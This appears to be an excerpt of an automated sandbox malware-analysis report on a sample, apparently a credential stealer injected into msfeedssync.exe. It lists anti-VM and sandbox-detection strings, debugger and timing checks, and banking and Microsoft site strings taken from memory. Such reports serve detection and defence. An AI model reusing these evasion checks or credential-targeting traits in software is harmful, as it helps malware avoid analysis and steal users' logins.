Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 2Stejb80vJ.exe PID: 6872, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF9105CD324
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF9105CD7E4
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF9105CD944
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF9105CD504
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF9105CD544
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF9105CD1E4
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF9105D0154
Source: C:\Windows\SysWOW64\msfeedssync.exe	API/Special instruction interceptor: Address: 7FF9105CDA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 2Stejb80vJ.exe, 00000000.00000002.1267757306.00000000030B6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Memory allocated: 1490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Memory allocated: 3040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Memory allocated: 5040000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 2_2_010D096E rdtsc

2_2_010D096E

Source: C:\Windows\SysWOW64\msfeedssync.exe	Window / User API: threadDelayed 1075			Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Window / User API: threadDelayed 8897			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\msfeedssync.exe	API coverage: 2.8 %

Source: C:\Windows\SysWOW64\msfeedssync.exe TID: 7040	Thread sleep count: 1075 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe TID: 7040	Thread sleep time: -2150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe TID: 7040	Thread sleep count: 8897 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe TID: 7040	Thread sleep time: -17794000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe TID: 1368	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe TID: 1368	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe TID: 1368	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe TID: 1368	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe TID: 1368	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msfeedssync.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msfeedssync.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\msfeedssync.exe

Code function: 9_2_0248C680 FindFirstFileW,FindNextFileW,FindClose,

9_2_0248C680

Source: 1euF2H00K.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: firefox.exe, 0000000B.00000002.1805656747.00000215317CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDD=
Source: 1euF2H00K.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 1euF2H00K.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PasswordVMware20,11696487552^
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,1)Yr
Source: 1euF2H00K.9.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 1euF2H00K.9.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 1euF2H00K.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 1euF2H00K.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 2Stejb80vJ.exe, 00000000.00000002.1267757306.00000000030B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rd.comVMware20,11696487552f
Source: 1euF2H00K.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 1euF2H00K.9.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 1euF2H00K.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 1euF2H00K.9.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,116
Source: 1euF2H00K.9.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: msfeedssync.exe, 00000009.00000002.3724212347.0000000002772000.00000004.00000020.00020000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000002.3725362894.00000000015EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: COM.HKVMware20,11696487552
Source: 1euF2H00K.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 1euF2H00K.9.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rokers - EU WestVMware20,11696487552n
Source: 1euF2H00K.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 1euF2H00K.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 1euF2H00K.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 1euF2H00K.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,1
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tion PasswordVMware20,11696487552}
Source: 1euF2H00K.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 1euF2H00K.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 2Stejb80vJ.exe, 00000000.00000002.1267757306.00000000030B6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x.intuit.comVMware20,11696487552t
Source: 1euF2H00K.9.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 1euF2H00K.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 1euF2H00K.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 1euF2H00K.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552
Source: 1euF2H00K.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 1euF2H00K.9.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 1euF2H00K.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: msfeedssync.exe, 00000009.00000002.3728191152.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .bankofamerica.comVMware20,11696
Source: 1euF2H00K.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 1euF2H00K.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 1euF2H00K.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 1euF2H00K.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\2Stejb80vJ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 2_2_010D096E rdtsc

2_2_010D096E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 2_2_00417853 LdrLoadDll,

2_2_00417853

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01150115 mov eax, dword ptr fs:[00000030h]	2_2_01150115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113A118 mov ecx, dword ptr fs:[00000030h]	2_2_0113A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113A118 mov eax, dword ptr fs:[00000030h]	2_2_0113A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113A118 mov eax, dword ptr fs:[00000030h]	2_2_0113A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113A118 mov eax, dword ptr fs:[00000030h]	2_2_0113A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov eax, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov ecx, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov eax, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov eax, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov ecx, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov eax, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov eax, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov ecx, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov eax, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0113E10E mov ecx, dword ptr fs:[00000030h]	2_2_0113E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010C0124 mov eax, dword ptr fs:[00000030h]	2_2_010C0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01128158 mov eax, dword ptr fs:[00000030h]	2_2_01128158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01124144 mov eax, dword ptr fs:[00000030h]	2_2_01124144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01124144 mov eax, dword ptr fs:[00000030h]	2_2_01124144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01124144 mov ecx, dword ptr fs:[00000030h]	2_2_01124144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01124144 mov eax, dword ptr fs:[00000030h]	2_2_01124144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01124144 mov eax, dword ptr fs:[00000030h]	2_2_01124144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096154 mov eax, dword ptr fs:[00000030h]	2_2_01096154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01096154 mov eax, dword ptr fs:[00000030h]	2_2_01096154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108C156 mov eax, dword ptr fs:[00000030h]	2_2_0108C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01164164 mov eax, dword ptr fs:[00000030h]	2_2_01164164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01164164 mov eax, dword ptr fs:[00000030h]	2_2_01164164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D0185 mov eax, dword ptr fs:[00000030h]	2_2_010D0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111019F mov eax, dword ptr fs:[00000030h]	2_2_0111019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111019F mov eax, dword ptr fs:[00000030h]	2_2_0111019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111019F mov eax, dword ptr fs:[00000030h]	2_2_0111019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111019F mov eax, dword ptr fs:[00000030h]	2_2_0111019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01134180 mov eax, dword ptr fs:[00000030h]	2_2_01134180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01134180 mov eax, dword ptr fs:[00000030h]	2_2_01134180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0114C188 mov eax, dword ptr fs:[00000030h]	2_2_0114C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0114C188 mov eax, dword ptr fs:[00000030h]	2_2_0114C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108A197 mov eax, dword ptr fs:[00000030h]	2_2_0108A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108A197 mov eax, dword ptr fs:[00000030h]	2_2_0108A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108A197 mov eax, dword ptr fs:[00000030h]	2_2_0108A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0110E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0110E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0110E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0110E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0110E1D0 mov ecx, dword ptr fs:[00000030h]	2_2_0110E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0110E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0110E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0110E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0110E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011561C3 mov eax, dword ptr fs:[00000030h]	2_2_011561C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011561C3 mov eax, dword ptr fs:[00000030h]	2_2_011561C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011661E5 mov eax, dword ptr fs:[00000030h]	2_2_011661E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010C01F8 mov eax, dword ptr fs:[00000030h]	2_2_010C01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01114000 mov ecx, dword ptr fs:[00000030h]	2_2_01114000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000 mov eax, dword ptr fs:[00000030h]	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000 mov eax, dword ptr fs:[00000030h]	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000 mov eax, dword ptr fs:[00000030h]	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000 mov eax, dword ptr fs:[00000030h]	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000 mov eax, dword ptr fs:[00000030h]	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000 mov eax, dword ptr fs:[00000030h]	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000 mov eax, dword ptr fs:[00000030h]	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01132000 mov eax, dword ptr fs:[00000030h]	2_2_01132000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AE016 mov eax, dword ptr fs:[00000030h]	2_2_010AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AE016 mov eax, dword ptr fs:[00000030h]	2_2_010AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AE016 mov eax, dword ptr fs:[00000030h]	2_2_010AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010AE016 mov eax, dword ptr fs:[00000030h]	2_2_010AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01126030 mov eax, dword ptr fs:[00000030h]	2_2_01126030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108A020 mov eax, dword ptr fs:[00000030h]	2_2_0108A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108C020 mov eax, dword ptr fs:[00000030h]	2_2_0108C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01116050 mov eax, dword ptr fs:[00000030h]	2_2_01116050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01092050 mov eax, dword ptr fs:[00000030h]	2_2_01092050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010BC073 mov eax, dword ptr fs:[00000030h]	2_2_010BC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0109208A mov eax, dword ptr fs:[00000030h]	2_2_0109208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010880A0 mov eax, dword ptr fs:[00000030h]	2_2_010880A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011560B8 mov eax, dword ptr fs:[00000030h]	2_2_011560B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011560B8 mov ecx, dword ptr fs:[00000030h]	2_2_011560B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011280A8 mov eax, dword ptr fs:[00000030h]	2_2_011280A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011120DE mov eax, dword ptr fs:[00000030h]	2_2_011120DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010980E9 mov eax, dword ptr fs:[00000030h]	2_2_010980E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0108A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_011160E0 mov eax, dword ptr fs:[00000030h]	2_2_011160E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0108C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D20F0 mov ecx, dword ptr fs:[00000030h]	2_2_010D20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CA30B mov eax, dword ptr fs:[00000030h]	2_2_010CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CA30B mov eax, dword ptr fs:[00000030h]	2_2_010CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010CA30B mov eax, dword ptr fs:[00000030h]	2_2_010CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0108C310 mov ecx, dword ptr fs:[00000030h]	2_2_0108C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010B0310 mov ecx, dword ptr fs:[00000030h]	2_2_010B0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0115A352 mov eax, dword ptr fs:[00000030h]	2_2_0115A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111035C mov eax, dword ptr fs:[00000030h]	2_2_0111035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111035C mov eax, dword ptr fs:[00000030h]	2_2_0111035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111035C mov eax, dword ptr fs:[00000030h]	2_2_0111035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111035C mov ecx, dword ptr fs:[00000030h]	2_2_0111035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111035C mov eax, dword ptr fs:[00000030h]	2_2_0111035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0111035C mov eax, dword ptr fs:[00000030h]	2_2_0111035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01112349 mov eax, dword ptr fs:[00000030h]	2_2_01112349
